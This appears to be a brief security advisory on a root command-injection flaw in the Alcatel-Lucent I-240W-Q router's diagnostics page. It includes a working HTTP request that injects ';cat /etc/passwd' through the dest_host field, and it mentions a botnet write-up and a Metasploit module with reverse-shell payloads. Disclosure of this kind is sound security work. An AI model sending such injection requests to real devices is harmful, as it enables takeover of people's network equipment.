Arbitrary Command Execution in Alcatel-Lucent I-240W-Q
The ONT Alcatel-Lucent I-240W-Q is vulnerable to arbitrary command execution in the administrative web interface.
|Model:||Alcatel Lucent I-240W-Q|
The vulnerability is located in the administrative web interface under: Maintenance > Diagnostics. The IP Address value for the Ping and Traceroute commands are not properly filtered and therefore allow multiple system commands to be run through the use of the ";" character.
The commands run with root privileges.
POST /GponForm/diag_XForm HTTP/1.1 Host: 192.168.1.254 Referer: http://192.168.1.254/diag.html Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 81 XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=%3Bcat+%2Fetc%2Fpasswd HTTP/0.9 200 OK
BLOG POSTDrive By ONT Botnet with IRC C&C
The blog post demonstrates the creation of a botnet using embedded devices which are controlled remotely through vulnerabilities exploited from a webpage.
This MSF exploit was created by Luis Colunga to execute remote reverse TCP MIPS payloads by exploiting a command execution vulnerability found in the ONT Alcatel Lucent I-240W.